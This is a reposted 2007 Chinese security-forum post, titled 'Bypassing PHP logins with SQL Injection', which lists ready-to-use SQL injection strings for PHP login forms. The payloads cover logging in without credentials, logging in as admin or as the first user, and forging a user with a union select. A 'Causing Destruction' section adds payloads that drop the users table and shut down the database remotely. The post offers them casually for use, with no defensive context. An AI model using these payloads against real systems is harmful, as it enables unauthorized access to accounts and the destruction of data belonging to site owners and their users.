[转载]Bypassing PHP logins with SQL Injection

叶孓落落

晶莹剔透§烈日灼然

Rank: 1

帖子: 4
精华: 0
积分: 19
阅读权限: 40
性别: 男
来自: somewhere
在线时间: 13 小时
注册时间: 2007-1-13
最后登录: 2007-7-14

发短消息
加为好友
当前离线

楼主大中小发表于 2007-7-13 15:27 只看该作者

[转载]Bypassing PHP logins with SQL Injection

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

I found this small text file on my computer last night, it explains the various bypass injections and when you should use them.

Enjoy ;)

To authenticate without any credentials we can use,
CODE
Username : ' OR '='
Password : ' OR '='

To authenticate with just the username.
CODE
Username : admin'--

To authenticate as the first user in the users table.
CODE
Username : ' or 1=1--

To authenticate as fictional user
CODE
Username : ' union select 1, 'user', 'passwd' 1 --

Causing Destruction

To drop a database table
CODE
Username : ';drop table users--

To shut down the database remotely
CODE
Username:hackuin60shackuin60s'
Password : '; shutdown--

HTTP:// NI4SB.COM

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » 脚本安全[ Web Application ] » [转载]Bypassing PHP logins with SQL Injection